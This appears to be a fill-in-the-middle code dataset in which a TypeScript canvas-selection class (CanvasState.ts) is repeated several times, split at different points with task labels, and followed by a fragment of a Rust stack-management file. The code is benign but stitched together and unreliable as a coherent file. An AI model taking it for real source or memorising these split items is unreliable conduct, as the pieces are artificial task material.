// This complicates things a little but but fixes mouse co-ordinate problems
// when there's a border or padding. See getMouse for more detail
var stylePaddingLeft, stylePaddingTop, styleBorderLeft, styleBorderTop;
if (document.defaultView && document.defaultView.getComputedStyle) {
this.stylePaddingLeft = parseInt(document.defaultView.getComputedStyle(canvas, null)['paddingLeft'], 10) || 0;
this.stylePaddingTop = parseInt(document.defaultView.getComputedStyle(canvas, null)['paddingTop'], 10) || 0;
this.styleBorderLeft = parseInt(document.defaultView.getComputedStyle(canvas, null)['borderLeftWidth'], 10) || 0;
this.styleBorderTop = parseInt(document.defaultView.getComputedStyle(canvas, null)['borderTopWidth'], 10) || 0;
}
this.border = 1 ;
// Some pages have fixed-position bars (like the stumbleupon bar) at the top or left of the page
// They will mess up mouse coordinates and this fixes that
var html = document.body.parentElement;
this.htmlTop = html.offsetTop;
this.htmlLeft = html.offsetLeft;
this.handleParentScroll = false ;
// **** Keep track of state! ****
this.valid = false; // when set to false, the canvas will redraw everything
this.shapes = []; // the collection of things to be drawn
this.dragging = false; // Keep track of when we are dragging
this.drawing = false; // Keep track of when we are drawing
// the current selected object. In the future we could turn this into an array for multiple selection
this.selection = null;
this.dragoffx = 0; // See mousedown and mousemove events for explanation
this.dragoffy = 0;
// This is an example of a closure!
// Right here "this" means the CanvasState. But we are making events on the Canvas itself,
// and when the events are fired on the canvas the variable "this" is going to mean the canvas!
// Since we still want to use this particular CanvasState in the events we have to save a reference to it.
// This is our reference!
var myState = this;
myState.alert = false;
// **** Options! ****
this.selectionColor = '#CC0000';
this.selectionWidth = 2;
this.interval = 10;
setInterval(function () { myState.draw(); }, myState.interval);
}
registerListeners = () => {
var myState = this;
var canvas = this.canvas;
//fixes a problem where double clicking causes text to get selected on the canvas
canvas.addEventListener('selectstart', function (e) { e.preventDefault(); return false; }, false);
// Up, down, and move are for dragging
canvas.addEventListener('mousedown', function (e) {
if (myState.imageObj !== false && myState.imageObj.width + 2 * myState.border != canvas.width) {
myState.dragging = false;
myState.drawing = false;
if (myState.alert == false) {
alert('La sélection de zone n\'est possible que si le zoom est désactivé !');
myState.alert = true;
}
} else {
var mouse = myState.getMouse(e);
var mx = mouse.x;
var my = mouse.y;
var shapes = myState.shapes;
var l = shapes.length;
for (var i = l - 1; i >= 0; i--) {
if (shapes[i].contains(mx, my, myState.scale)) {
var mySel = shapes[i];
// Keep track of where in the object we clicked
// so we can move it smoothly (see mousemove)
myState.dragoffx = mx - mySel.x;
myState.dragoffy = my - mySel.y;
myState.dragging = true;
myState.selection = mySel;
console.log('Selection : ') ;
console.log(myState.selection) ;
myState.valid = false;
return;
}
}
// havent returned means we have failed to select anything.
// If there was an object selected, we deselect it
if (myState.selection) {
myState.selection = null;
console.log('Selection : ') ;
console.log(myState.selection) ;
myState.valid = false; // Need to clear the old selection border
}
myState.drawing = true;
myState.drawingoffx = mx;
myState.drawingoffy = my;
}
}, true);
canvas.addEventListener('mousemove', function (e) {
if (myState.dragging) {
var mouse = myState.getMouse(e); | myState.selection.y = mouse.y - myState.dragoffy;
myState.valid = false; // Something's dragging so we must redraw
} else if (myState.drawing) {
var mouse = myState.getMouse(e);
// Add temp shape
var _h = Math.abs(mouse.y - myState.drawingoffy);
var _w = Math.abs(mouse.x - myState.drawingoffx);
var _shape = new Shape(myState.drawingoffx, myState.drawingoffy, _w, _h, 'rgba(0,255,0,.6)');
_shape.temp = true;
myState.addShape(_shape);
}
}, true);
canvas.addEventListener('mouseup', function (e) {
if (myState.drawing === true) {
var mouse = myState.getMouse(e);
var _h = Math.abs(mouse.y - myState.drawingoffy);
var _w = Math.abs(mouse.x - myState.drawingoffx);
if (_w > 120 && _h > 17) {
var _shape = new Shape(myState.drawingoffx, myState.drawingoffy, _w, _h, mouse.y, false);
myState.addShape(_shape);
} else {
myState.removeTempShape();
}
myState.valid = false; // Need to clear the old selection border
}
myState.dragging = false;
myState.drawing = false;
}, true);
}
removeTempShape = () => {
var _shapes = [];
for (var i in this.shapes) {
if (this.shapes[i].temp !== true) {
_shapes.push(this.shapes[i]);
}
}
this.shapes = _shapes;
}
addShape = (shape:Shape) => {
var _shapes = [];
var _nextRef = 1;
this.shapes = this.shapes.sort(function (a, b) {
if (a.ref < b.ref) {
return -1;
} else if (a.ref > b.ref) {
return 1;
} else {
return 0;
}
});
// compute the next reference
for (var i in this.shapes) {
if (this.shapes[i].temp !== true) {
var _ref = this.shapes[i].ref;
if (_nextRef < _ref) {
break;
} else if (_ref >= _nextRef) {
_nextRef = _ref + 1;
}
}
}
// prepare the new data
for (var i in this.shapes) {
if (this.shapes[i].temp !== true) {
_shapes.push(this.shapes[i]);
}
}
this.shapes = _shapes;
shape.ref = _nextRef;
if(this.onAddShape && shape.temp === false) {
this.onAddShape(shape) ;
}
this.shapes.push(shape);
if (shape.temp !== true) {
// -> binded shapes
}
this.selection = null;
console.log('On AddShape -> Selection : ') ;
console.log(this.selection) ;
this.valid = false;
}
cropShape = (shape:Shape) => {
//Find the part of the image that is inside the crop box
var crop_canvas,
left = shape.x,
top = shape.y,
width = shape.w,
height = shape.h;
crop_canvas = document.createElement('canvas');
crop_canvas.width = width;
crop_canvas.height = height;
try {
crop_canvas.getContext('2d').drawImage(this.imageObj,
left - this.border, top - this.border, width, height, 0, 0, width, height);
return crop_canvas.toDataURL("image/png");
} catch (error) {
alert('La sélection de zone ' + shape.ref + ' dépasse les limites de l\'ordonnance !');
return null;
}
}
removeShape = (shape:Shape) => {
var _shapes = [];
for (var i in this.shapes) {
if (!(shape.x == this.shapes[i].x
&& shape.y == this.shapes[i].y
&& shape.w == this.shapes[i].w
&& shape.h == this.shapes[i].h)) {
_shapes.push(this.shapes[i]);
}
}
this.shapes = _shapes;
// -> binde shapes
this.selection = null;
console.log('On RemoveShape -> Selection : ') ;
console.log(this.selection) ;
this.valid = false;
}
clear = () => {
this.ctx.clearRect(0, 0, this.width, this.height);
}
drawImage = () => {
var WIDTH = this.imageObj.width + 2 * this.border;
var HEIGHT = this.imageObj.height + 2 * this.border;
this.canvas.width = WIDTH * this.scale;
this.canvas.height = HEIGHT * this.scale;
this.canvas.getContext('2d').scale(this.scale, this.scale);
this.width = this.canvas.width;
this.height = this.canvas.height;
}
// While draw is called as often as the INTERVAL variable demands,
// It only ever does something if the canvas gets invalidated by our code
draw = () => {
// if our state is invalid, redraw and validate!
if (!this.valid) {
var ctx = this.ctx;
this.drawImage() ;
var shapes = this.shapes;
this.clear();
if (this.imageObj !== false && this.imageObj != undefined) {
if (this.border) {
ctx.stroke();
ctx.rect(0, 0, this.width, this.height);
ctx.strokeStyle = 'white';
ctx.lineWidth = this.border;
}
// ** Add stuff you want drawn in the background all the time here **
ctx.drawImage(this.imageObj, this.border, this.border);
}
// draw all shapes
var l = shapes.length;
var _oneShapeDraw = false;
for (var i = 0; i < l; i++) {
var shape = shapes[i];
// We can skip the drawing of elements that have moved off the screen:
if (shape == undefined || shape.hide || (typeof shape.draw != "function") || shape.x > this.width || shape.y > this.height ||
shape.x + shape.w < 0 || shape.y + shape.h < 0) {
// Shape not to be drawed
continue;
}
shape.draw(ctx);
_oneShapeDraw = true;
}
// draw selection
// right now this is just a stroke along the edge of the selected Shape
if (_oneShapeDraw && this.selection != null) {
ctx.strokeStyle = this.selectionColor;
ctx.lineWidth = this.selectionWidth;
var mySel = this.selection;
ctx.strokeRect(mySel.x, mySel.y, mySel.w, mySel.h);
}
// ** Add stuff you want drawn on top all the time here **
this.valid = true;
}
}
// Creates an object with x and y defined, set to the mouse position relative to the state's canvas
// If you wanna be super-correct this can be tricky, we have to worry about padding and borders
getMouse = (e) => {
var element = this.canvas, offsetX = 0, offsetY = 0, mx, my;
// Compute the total offset
if (element.offsetParent !== undefined) {
do {
offsetX += element.offsetLeft;
offsetY += element.offsetTop;
} while ((element = element.offsetParent));
}
// Add padding and border style widths to offset
// Also add the <html> offsets in case there's a position:fixed bar
offsetX += this.stylePaddingLeft + this.styleBorderLeft + this.htmlLeft;
offsetY += this.stylePaddingTop + this.styleBorderTop + this.htmlTop;
var scrollY = 0 ;
if(this.handleParentScroll === true) {
element = this.canvas
do {
scrollY = $(element).scrollTop() ;
} while (scrollY == 0 && (element = element.parentNode));
}
mx = e.pageX - offsetX;
my = e.pageY + scrollY - offsetY;
// We return a simple javascript object (a hash) with x and y defined
return { x: mx, y: my };
}
} | // We don't want to drag the object by its top-left corner, we want to drag it
// from where we clicked. Thats why we saved the offset and use it here
myState.selection.x = mouse.x - myState.dragoffx; | random_line_split |
CanvasState.ts | import Shape from './Shape'
import * as $ from 'jquery'
export default class CanvasState {
canvas:any;
width:number;
height:number;
ctx:any;
stylePaddingLeft:number;
stylePaddingTop:number;
styleBorderLeft:number;
styleBorderTop:number;
htmlTop : number;
htmlLeft:number;
valid:boolean;
alert:boolean;
dragging:boolean;
drawing:boolean;
selection: any;
dragoffx:number;
dragoffy:number;
drawingoffx:number;
drawingoffy:number;
shapes:Array<Shape>;
selectionColor:string;
selectionWidth:number;
interval:number;
imageObj:any;
border:number;
scale:number;
handleParentScroll:boolean;
onAddShape: (shape:Shape) => void;
constructor(canvas) |
registerListeners = () => {
var myState = this;
var canvas = this.canvas;
//fixes a problem where double clicking causes text to get selected on the canvas
canvas.addEventListener('selectstart', function (e) { e.preventDefault(); return false; }, false);
// Up, down, and move are for dragging
canvas.addEventListener('mousedown', function (e) {
if (myState.imageObj !== false && myState.imageObj.width + 2 * myState.border != canvas.width) {
myState.dragging = false;
myState.drawing = false;
if (myState.alert == false) {
alert('La sélection de zone n\'est possible que si le zoom est désactivé !');
myState.alert = true;
}
} else {
var mouse = myState.getMouse(e);
var mx = mouse.x;
var my = mouse.y;
var shapes = myState.shapes;
var l = shapes.length;
for (var i = l - 1; i >= 0; i--) {
if (shapes[i].contains(mx, my, myState.scale)) {
var mySel = shapes[i];
// Keep track of where in the object we clicked
// so we can move it smoothly (see mousemove)
myState.dragoffx = mx - mySel.x;
myState.dragoffy = my - mySel.y;
myState.dragging = true;
myState.selection = mySel;
console.log('Selection : ') ;
console.log(myState.selection) ;
myState.valid = false;
return;
}
}
// havent returned means we have failed to select anything.
// If there was an object selected, we deselect it
if (myState.selection) {
myState.selection = null;
console.log('Selection : ') ;
console.log(myState.selection) ;
myState.valid = false; // Need to clear the old selection border
}
myState.drawing = true;
myState.drawingoffx = mx;
myState.drawingoffy = my;
}
}, true);
canvas.addEventListener('mousemove', function (e) {
if (myState.dragging) {
var mouse = myState.getMouse(e);
// We don't want to drag the object by its top-left corner, we want to drag it
// from where we clicked. Thats why we saved the offset and use it here
myState.selection.x = mouse.x - myState.dragoffx;
myState.selection.y = mouse.y - myState.dragoffy;
myState.valid = false; // Something's dragging so we must redraw
} else if (myState.drawing) {
var mouse = myState.getMouse(e);
// Add temp shape
var _h = Math.abs(mouse.y - myState.drawingoffy);
var _w = Math.abs(mouse.x - myState.drawingoffx);
var _shape = new Shape(myState.drawingoffx, myState.drawingoffy, _w, _h, 'rgba(0,255,0,.6)');
_shape.temp = true;
myState.addShape(_shape);
}
}, true);
canvas.addEventListener('mouseup', function (e) {
if (myState.drawing === true) {
var mouse = myState.getMouse(e);
var _h = Math.abs(mouse.y - myState.drawingoffy);
var _w = Math.abs(mouse.x - myState.drawingoffx);
if (_w > 120 && _h > 17) {
var _shape = new Shape(myState.drawingoffx, myState.drawingoffy, _w, _h, mouse.y, false);
myState.addShape(_shape);
} else {
myState.removeTempShape();
}
myState.valid = false; // Need to clear the old selection border
}
myState.dragging = false;
myState.drawing = false;
}, true);
}
removeTempShape = () => {
var _shapes = [];
for (var i in this.shapes) {
if (this.shapes[i].temp !== true) {
_shapes.push(this.shapes[i]);
}
}
this.shapes = _shapes;
}
addShape = (shape:Shape) => {
var _shapes = [];
var _nextRef = 1;
this.shapes = this.shapes.sort(function (a, b) {
if (a.ref < b.ref) {
return -1;
} else if (a.ref > b.ref) {
return 1;
} else {
return 0;
}
});
// compute the next reference
for (var i in this.shapes) {
if (this.shapes[i].temp !== true) {
var _ref = this.shapes[i].ref;
if (_nextRef < _ref) {
break;
} else if (_ref >= _nextRef) {
_nextRef = _ref + 1;
}
}
}
// prepare the new data
for (var i in this.shapes) {
if (this.shapes[i].temp !== true) {
_shapes.push(this.shapes[i]);
}
}
this.shapes = _shapes;
shape.ref = _nextRef;
if(this.onAddShape && shape.temp === false) {
this.onAddShape(shape) ;
}
this.shapes.push(shape);
if (shape.temp !== true) {
// -> binded shapes
}
this.selection = null;
console.log('On AddShape -> Selection : ') ;
console.log(this.selection) ;
this.valid = false;
}
cropShape = (shape:Shape) => {
//Find the part of the image that is inside the crop box
var crop_canvas,
left = shape.x,
top = shape.y,
width = shape.w,
height = shape.h;
crop_canvas = document.createElement('canvas');
crop_canvas.width = width;
crop_canvas.height = height;
try {
crop_canvas.getContext('2d').drawImage(this.imageObj,
left - this.border, top - this.border, width, height, 0, 0, width, height);
return crop_canvas.toDataURL("image/png");
} catch (error) {
alert('La sélection de zone ' + shape.ref + ' dépasse les limites de l\'ordonnance !');
return null;
}
}
removeShape = (shape:Shape) => {
var _shapes = [];
for (var i in this.shapes) {
if (!(shape.x == this.shapes[i].x
&& shape.y == this.shapes[i].y
&& shape.w == this.shapes[i].w
&& shape.h == this.shapes[i].h)) {
_shapes.push(this.shapes[i]);
}
}
this.shapes = _shapes;
// -> binde shapes
this.selection = null;
console.log('On RemoveShape -> Selection : ') ;
console.log(this.selection) ;
this.valid = false;
}
clear = () => {
this.ctx.clearRect(0, 0, this.width, this.height);
}
drawImage = () => {
var WIDTH = this.imageObj.width + 2 * this.border;
var HEIGHT = this.imageObj.height + 2 * this.border;
this.canvas.width = WIDTH * this.scale;
this.canvas.height = HEIGHT * this.scale;
this.canvas.getContext('2d').scale(this.scale, this.scale);
this.width = this.canvas.width;
this.height = this.canvas.height;
}
// While draw is called as often as the INTERVAL variable demands,
// It only ever does something if the canvas gets invalidated by our code
draw = () => {
// if our state is invalid, redraw and validate!
if (!this.valid) {
var ctx = this.ctx;
this.drawImage() ;
var shapes = this.shapes;
this.clear();
if (this.imageObj !== false && this.imageObj != undefined) {
if (this.border) {
ctx.stroke();
ctx.rect(0, 0, this.width, this.height);
ctx.strokeStyle = 'white';
ctx.lineWidth = this.border;
}
// ** Add stuff you want drawn in the background all the time here **
ctx.drawImage(this.imageObj, this.border, this.border);
}
// draw all shapes
var l = shapes.length;
var _oneShapeDraw = false;
for (var i = 0; i < l; i++) {
var shape = shapes[i];
// We can skip the drawing of elements that have moved off the screen:
if (shape == undefined || shape.hide || (typeof shape.draw != "function") || shape.x > this.width || shape.y > this.height ||
shape.x + shape.w < 0 || shape.y + shape.h < 0) {
// Shape not to be drawed
continue;
}
shape.draw(ctx);
_oneShapeDraw = true;
}
// draw selection
// right now this is just a stroke along the edge of the selected Shape
if (_oneShapeDraw && this.selection != null) {
ctx.strokeStyle = this.selectionColor;
ctx.lineWidth = this.selectionWidth;
var mySel = this.selection;
ctx.strokeRect(mySel.x, mySel.y, mySel.w, mySel.h);
}
// ** Add stuff you want drawn on top all the time here **
this.valid = true;
}
}
// Creates an object with x and y defined, set to the mouse position relative to the state's canvas
// If you wanna be super-correct this can be tricky, we have to worry about padding and borders
getMouse = (e) => {
var element = this.canvas, offsetX = 0, offsetY = 0, mx, my;
// Compute the total offset
if (element.offsetParent !== undefined) {
do {
offsetX += element.offsetLeft;
offsetY += element.offsetTop;
} while ((element = element.offsetParent));
}
// Add padding and border style widths to offset
// Also add the <html> offsets in case there's a position:fixed bar
offsetX += this.stylePaddingLeft + this.styleBorderLeft + this.htmlLeft;
offsetY += this.stylePaddingTop + this.styleBorderTop + this.htmlTop;
var scrollY = 0 ;
if(this.handleParentScroll === true) {
element = this.canvas
do {
scrollY = $(element).scrollTop() ;
} while (scrollY == 0 && (element = element.parentNode));
}
mx = e.pageX - offsetX;
my = e.pageY + scrollY - offsetY;
// We return a simple javascript object (a hash) with x and y defined
return { x: mx, y: my };
}
} | {
// **** First some setup! ****
this.canvas = canvas;
this.width = canvas.width;
this.height = canvas.height;
this.ctx = canvas.getContext('2d');
// This complicates things a little but but fixes mouse co-ordinate problems
// when there's a border or padding. See getMouse for more detail
var stylePaddingLeft, stylePaddingTop, styleBorderLeft, styleBorderTop;
if (document.defaultView && document.defaultView.getComputedStyle) {
this.stylePaddingLeft = parseInt(document.defaultView.getComputedStyle(canvas, null)['paddingLeft'], 10) || 0;
this.stylePaddingTop = parseInt(document.defaultView.getComputedStyle(canvas, null)['paddingTop'], 10) || 0;
this.styleBorderLeft = parseInt(document.defaultView.getComputedStyle(canvas, null)['borderLeftWidth'], 10) || 0;
this.styleBorderTop = parseInt(document.defaultView.getComputedStyle(canvas, null)['borderTopWidth'], 10) || 0;
}
this.border = 1 ;
// Some pages have fixed-position bars (like the stumbleupon bar) at the top or left of the page
// They will mess up mouse coordinates and this fixes that
var html = document.body.parentElement;
this.htmlTop = html.offsetTop;
this.htmlLeft = html.offsetLeft;
this.handleParentScroll = false ;
// **** Keep track of state! ****
this.valid = false; // when set to false, the canvas will redraw everything
this.shapes = []; // the collection of things to be drawn
this.dragging = false; // Keep track of when we are dragging
this.drawing = false; // Keep track of when we are drawing
// the current selected object. In the future we could turn this into an array for multiple selection
this.selection = null;
this.dragoffx = 0; // See mousedown and mousemove events for explanation
this.dragoffy = 0;
// This is an example of a closure!
// Right here "this" means the CanvasState. But we are making events on the Canvas itself,
// and when the events are fired on the canvas the variable "this" is going to mean the canvas!
// Since we still want to use this particular CanvasState in the events we have to save a reference to it.
// This is our reference!
var myState = this;
myState.alert = false;
// **** Options! ****
this.selectionColor = '#CC0000';
this.selectionWidth = 2;
this.interval = 10;
setInterval(function () { myState.draw(); }, myState.interval);
} | identifier_body |
CanvasState.ts | import Shape from './Shape'
import * as $ from 'jquery'
export default class CanvasState {
canvas:any;
width:number;
height:number;
ctx:any;
stylePaddingLeft:number;
stylePaddingTop:number;
styleBorderLeft:number;
styleBorderTop:number;
htmlTop : number;
htmlLeft:number;
valid:boolean;
alert:boolean;
dragging:boolean;
drawing:boolean;
selection: any;
dragoffx:number;
dragoffy:number;
drawingoffx:number;
drawingoffy:number;
shapes:Array<Shape>;
selectionColor:string;
selectionWidth:number;
interval:number;
imageObj:any;
border:number;
scale:number;
handleParentScroll:boolean;
onAddShape: (shape:Shape) => void;
| (canvas) {
// **** First some setup! ****
this.canvas = canvas;
this.width = canvas.width;
this.height = canvas.height;
this.ctx = canvas.getContext('2d');
// This complicates things a little but but fixes mouse co-ordinate problems
// when there's a border or padding. See getMouse for more detail
var stylePaddingLeft, stylePaddingTop, styleBorderLeft, styleBorderTop;
if (document.defaultView && document.defaultView.getComputedStyle) {
this.stylePaddingLeft = parseInt(document.defaultView.getComputedStyle(canvas, null)['paddingLeft'], 10) || 0;
this.stylePaddingTop = parseInt(document.defaultView.getComputedStyle(canvas, null)['paddingTop'], 10) || 0;
this.styleBorderLeft = parseInt(document.defaultView.getComputedStyle(canvas, null)['borderLeftWidth'], 10) || 0;
this.styleBorderTop = parseInt(document.defaultView.getComputedStyle(canvas, null)['borderTopWidth'], 10) || 0;
}
this.border = 1 ;
// Some pages have fixed-position bars (like the stumbleupon bar) at the top or left of the page
// They will mess up mouse coordinates and this fixes that
var html = document.body.parentElement;
this.htmlTop = html.offsetTop;
this.htmlLeft = html.offsetLeft;
this.handleParentScroll = false ;
// **** Keep track of state! ****
this.valid = false; // when set to false, the canvas will redraw everything
this.shapes = []; // the collection of things to be drawn
this.dragging = false; // Keep track of when we are dragging
this.drawing = false; // Keep track of when we are drawing
// the current selected object. In the future we could turn this into an array for multiple selection
this.selection = null;
this.dragoffx = 0; // See mousedown and mousemove events for explanation
this.dragoffy = 0;
// This is an example of a closure!
// Right here "this" means the CanvasState. But we are making events on the Canvas itself,
// and when the events are fired on the canvas the variable "this" is going to mean the canvas!
// Since we still want to use this particular CanvasState in the events we have to save a reference to it.
// This is our reference!
var myState = this;
myState.alert = false;
// **** Options! ****
this.selectionColor = '#CC0000';
this.selectionWidth = 2;
this.interval = 10;
setInterval(function () { myState.draw(); }, myState.interval);
}
registerListeners = () => {
var myState = this;
var canvas = this.canvas;
//fixes a problem where double clicking causes text to get selected on the canvas
canvas.addEventListener('selectstart', function (e) { e.preventDefault(); return false; }, false);
// Up, down, and move are for dragging
canvas.addEventListener('mousedown', function (e) {
if (myState.imageObj !== false && myState.imageObj.width + 2 * myState.border != canvas.width) {
myState.dragging = false;
myState.drawing = false;
if (myState.alert == false) {
alert('La sélection de zone n\'est possible que si le zoom est désactivé !');
myState.alert = true;
}
} else {
var mouse = myState.getMouse(e);
var mx = mouse.x;
var my = mouse.y;
var shapes = myState.shapes;
var l = shapes.length;
for (var i = l - 1; i >= 0; i--) {
if (shapes[i].contains(mx, my, myState.scale)) {
var mySel = shapes[i];
// Keep track of where in the object we clicked
// so we can move it smoothly (see mousemove)
myState.dragoffx = mx - mySel.x;
myState.dragoffy = my - mySel.y;
myState.dragging = true;
myState.selection = mySel;
console.log('Selection : ') ;
console.log(myState.selection) ;
myState.valid = false;
return;
}
}
// havent returned means we have failed to select anything.
// If there was an object selected, we deselect it
if (myState.selection) {
myState.selection = null;
console.log('Selection : ') ;
console.log(myState.selection) ;
myState.valid = false; // Need to clear the old selection border
}
myState.drawing = true;
myState.drawingoffx = mx;
myState.drawingoffy = my;
}
}, true);
canvas.addEventListener('mousemove', function (e) {
if (myState.dragging) {
var mouse = myState.getMouse(e);
// We don't want to drag the object by its top-left corner, we want to drag it
// from where we clicked. Thats why we saved the offset and use it here
myState.selection.x = mouse.x - myState.dragoffx;
myState.selection.y = mouse.y - myState.dragoffy;
myState.valid = false; // Something's dragging so we must redraw
} else if (myState.drawing) {
var mouse = myState.getMouse(e);
// Add temp shape
var _h = Math.abs(mouse.y - myState.drawingoffy);
var _w = Math.abs(mouse.x - myState.drawingoffx);
var _shape = new Shape(myState.drawingoffx, myState.drawingoffy, _w, _h, 'rgba(0,255,0,.6)');
_shape.temp = true;
myState.addShape(_shape);
}
}, true);
canvas.addEventListener('mouseup', function (e) {
if (myState.drawing === true) {
var mouse = myState.getMouse(e);
var _h = Math.abs(mouse.y - myState.drawingoffy);
var _w = Math.abs(mouse.x - myState.drawingoffx);
if (_w > 120 && _h > 17) {
var _shape = new Shape(myState.drawingoffx, myState.drawingoffy, _w, _h, mouse.y, false);
myState.addShape(_shape);
} else {
myState.removeTempShape();
}
myState.valid = false; // Need to clear the old selection border
}
myState.dragging = false;
myState.drawing = false;
}, true);
}
removeTempShape = () => {
var _shapes = [];
for (var i in this.shapes) {
if (this.shapes[i].temp !== true) {
_shapes.push(this.shapes[i]);
}
}
this.shapes = _shapes;
}
addShape = (shape:Shape) => {
var _shapes = [];
var _nextRef = 1;
this.shapes = this.shapes.sort(function (a, b) {
if (a.ref < b.ref) {
return -1;
} else if (a.ref > b.ref) {
return 1;
} else {
return 0;
}
});
// compute the next reference
for (var i in this.shapes) {
if (this.shapes[i].temp !== true) {
var _ref = this.shapes[i].ref;
if (_nextRef < _ref) {
break;
} else if (_ref >= _nextRef) {
_nextRef = _ref + 1;
}
}
}
// prepare the new data
for (var i in this.shapes) {
if (this.shapes[i].temp !== true) {
_shapes.push(this.shapes[i]);
}
}
this.shapes = _shapes;
shape.ref = _nextRef;
if(this.onAddShape && shape.temp === false) {
this.onAddShape(shape) ;
}
this.shapes.push(shape);
if (shape.temp !== true) {
// -> binded shapes
}
this.selection = null;
console.log('On AddShape -> Selection : ') ;
console.log(this.selection) ;
this.valid = false;
}
cropShape = (shape:Shape) => {
//Find the part of the image that is inside the crop box
var crop_canvas,
left = shape.x,
top = shape.y,
width = shape.w,
height = shape.h;
crop_canvas = document.createElement('canvas');
crop_canvas.width = width;
crop_canvas.height = height;
try {
crop_canvas.getContext('2d').drawImage(this.imageObj,
left - this.border, top - this.border, width, height, 0, 0, width, height);
return crop_canvas.toDataURL("image/png");
} catch (error) {
alert('La sélection de zone ' + shape.ref + ' dépasse les limites de l\'ordonnance !');
return null;
}
}
removeShape = (shape:Shape) => {
var _shapes = [];
for (var i in this.shapes) {
if (!(shape.x == this.shapes[i].x
&& shape.y == this.shapes[i].y
&& shape.w == this.shapes[i].w
&& shape.h == this.shapes[i].h)) {
_shapes.push(this.shapes[i]);
}
}
this.shapes = _shapes;
// -> binde shapes
this.selection = null;
console.log('On RemoveShape -> Selection : ') ;
console.log(this.selection) ;
this.valid = false;
}
clear = () => {
this.ctx.clearRect(0, 0, this.width, this.height);
}
drawImage = () => {
var WIDTH = this.imageObj.width + 2 * this.border;
var HEIGHT = this.imageObj.height + 2 * this.border;
this.canvas.width = WIDTH * this.scale;
this.canvas.height = HEIGHT * this.scale;
this.canvas.getContext('2d').scale(this.scale, this.scale);
this.width = this.canvas.width;
this.height = this.canvas.height;
}
// While draw is called as often as the INTERVAL variable demands,
// It only ever does something if the canvas gets invalidated by our code
draw = () => {
// if our state is invalid, redraw and validate!
if (!this.valid) {
var ctx = this.ctx;
this.drawImage() ;
var shapes = this.shapes;
this.clear();
if (this.imageObj !== false && this.imageObj != undefined) {
if (this.border) {
ctx.stroke();
ctx.rect(0, 0, this.width, this.height);
ctx.strokeStyle = 'white';
ctx.lineWidth = this.border;
}
// ** Add stuff you want drawn in the background all the time here **
ctx.drawImage(this.imageObj, this.border, this.border);
}
// draw all shapes
var l = shapes.length;
var _oneShapeDraw = false;
for (var i = 0; i < l; i++) {
var shape = shapes[i];
// We can skip the drawing of elements that have moved off the screen:
if (shape == undefined || shape.hide || (typeof shape.draw != "function") || shape.x > this.width || shape.y > this.height ||
shape.x + shape.w < 0 || shape.y + shape.h < 0) {
// Shape not to be drawed
continue;
}
shape.draw(ctx);
_oneShapeDraw = true;
}
// draw selection
// right now this is just a stroke along the edge of the selected Shape
if (_oneShapeDraw && this.selection != null) {
ctx.strokeStyle = this.selectionColor;
ctx.lineWidth = this.selectionWidth;
var mySel = this.selection;
ctx.strokeRect(mySel.x, mySel.y, mySel.w, mySel.h);
}
// ** Add stuff you want drawn on top all the time here **
this.valid = true;
}
}
// Creates an object with x and y defined, set to the mouse position relative to the state's canvas
// If you wanna be super-correct this can be tricky, we have to worry about padding and borders
getMouse = (e) => {
var element = this.canvas, offsetX = 0, offsetY = 0, mx, my;
// Compute the total offset
if (element.offsetParent !== undefined) {
do {
offsetX += element.offsetLeft;
offsetY += element.offsetTop;
} while ((element = element.offsetParent));
}
// Add padding and border style widths to offset
// Also add the <html> offsets in case there's a position:fixed bar
offsetX += this.stylePaddingLeft + this.styleBorderLeft + this.htmlLeft;
offsetY += this.stylePaddingTop + this.styleBorderTop + this.htmlTop;
var scrollY = 0 ;
if(this.handleParentScroll === true) {
element = this.canvas
do {
scrollY = $(element).scrollTop() ;
} while (scrollY == 0 && (element = element.parentNode));
}
mx = e.pageX - offsetX;
my = e.pageY + scrollY - offsetY;
// We return a simple javascript object (a hash) with x and y defined
return { x: mx, y: my };
}
} | constructor | identifier_name |
stack.rs | // Copied from:
// rust/src/librustrt/stack.rs
// git: 70cef9474a3307ec763efc01fe6969e542083823
// stack_exhausted() function deleted, no other changes.
// TODO replace with proper runtime-less native threading once Rust gains
// support for this.
// Copyright 2013 The Rust Project Developers. See the COPYRIGHT
// file at the top-level directory of this distribution and at
// http://rust-lang.org/COPYRIGHT.
//
// Licensed under the Apache License, Version 2.0 <LICENSE-APACHE or
// http://www.apache.org/licenses/LICENSE-2.0> or the MIT license
// <LICENSE-MIT or http://opensource.org/licenses/MIT>, at your
// option. This file may not be copied, modified, or distributed
// except according to those terms.
//! Rust stack-limit management
//!
//! Currently Rust uses a segmented-stack-like scheme in order to detect stack
//! overflow for rust tasks. In this scheme, the prologue of all functions are
//! preceded with a check to see whether the current stack limits are being
//! exceeded.
//!
//! This module provides the functionality necessary in order to manage these
//! stack limits (which are stored in platform-specific locations). The
//! functions here are used at the borders of the task lifetime in order to
//! manage these limits.
//!
//! This function is an unstable module because this scheme for stack overflow
//! detection is not guaranteed to continue in the future. Usage of this module
//! is discouraged unless absolutely necessary.
// iOS related notes
//
// It is possible to implement it using idea from
// http://www.opensource.apple.com/source/Libc/Libc-825.40.1/pthreads/pthread_machdep.h
//
// In short: _pthread_{get,set}_specific_direct allows extremely fast
// access, exactly what is required for segmented stack
// There is a pool of reserved slots for Apple internal use (0..119)
// First dynamic allocated pthread key starts with 257 (on iOS7)
// So using slot 149 should be pretty safe ASSUMING space is reserved
// for every key < first dynamic key
//
// There is also an opportunity to steal keys reserved for Garbage Collection
// ranges 80..89 and 110..119, especially considering the fact Garbage Collection
// never supposed to work on iOS. But as everybody knows it - there is a chance
// that those slots will be re-used, like it happened with key 95 (moved from
// JavaScriptCore to CoreText)
//
// Unfortunately Apple rejected patch to LLVM which generated
// corresponding prolog, decision was taken to disable segmented
// stack support on iOS.
pub const RED_ZONE: uint = 20 * 1024;
// Windows maintains a record of upper and lower stack bounds in the Thread Information
// Block (TIB), and some syscalls do check that addresses which are supposed to be in
// the stack, indeed lie between these two values.
// (See https://github.com/rust-lang/rust/issues/3445#issuecomment-26114839)
//
// When using Rust-managed stacks (libgreen), we must maintain these values accordingly.
// For OS-managed stacks (libnative), we let the OS manage them for us.
//
// On all other platforms both variants behave identically.
#[inline(always)]
pub unsafe fn record_os_managed_stack_bounds(stack_lo: uint, _stack_hi: uint) {
record_sp_limit(stack_lo + RED_ZONE);
}
#[inline(always)]
pub unsafe fn record_rust_managed_stack_bounds(stack_lo: uint, stack_hi: uint) {
// When the old runtime had segmented stacks, it used a calculation that was
// "limit + RED_ZONE + FUDGE". The red zone was for things like dynamic
// symbol resolution, llvm function calls, etc. In theory this red zone
// value is 0, but it matters far less when we have gigantic stacks because
